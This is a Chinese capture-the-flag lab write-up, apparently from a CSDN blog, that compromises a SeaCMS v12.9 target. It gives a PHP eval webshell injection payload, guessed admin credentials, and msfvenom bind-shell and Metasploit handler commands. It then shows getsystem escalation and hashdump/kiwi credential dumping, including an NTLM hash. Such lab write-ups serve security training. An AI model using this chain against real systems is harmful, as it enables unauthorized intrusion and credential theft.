CyberStrikeLab PT-1

考点:seacms rce ,msfvemon木马,getsystem权限提升,hashdump/load kiwi+creds_all

seacms


首先得知是seacms,但不知道什么版本

seacms版本


访问/data/admin/ver.txt目录,得到seacms版本v12.9

直接网上搜索版本历史漏洞
参考:https://blog.csdn.net/holyxp/article/details/140734295

直接尝试找后台路径
/cslab/

接着猜出账号密码 cslab:cslab

seacms rce


在会员消息通知界面可以插入木马命令执行

参考上面博客,在第一行插入一下语句,点击保存即可
 

1";@eval($_POST[cmd]);;//

系统为windows

蚁剑


注意蚁剑木马连接路径为
http://10.0.0.68/data/admin/notify.php
 

别用以下路径连接,连不上,但是可以命令执行
http://10.0.0.68/cslab/admin_notify.php

flag01


flag01在C盘根目录下


msf正向连接


之所以要正向连接,本人是windows系统,要用虚拟机,如果是mac就不用正向连接了

先用命令生成一个正向连接木马

msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4444 -f exe > shell.exe 

用蚁剑上传到目标,运行

再开启正向连接
 

msfconsole

use exploit/multi/handler

set payload windows/x64/meterpreter/bind_tcp

set rhost 10.0.0.68

set lport 4444

run

提权


直接用getsystem提权

flag02


直接hashdump,得到ntlm cad8ef0c410c9709cea512052756ce5a

或者用load kiwi命令载入Mimikatz
最后用creds_all获取全部信息

注意flag格式哦!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值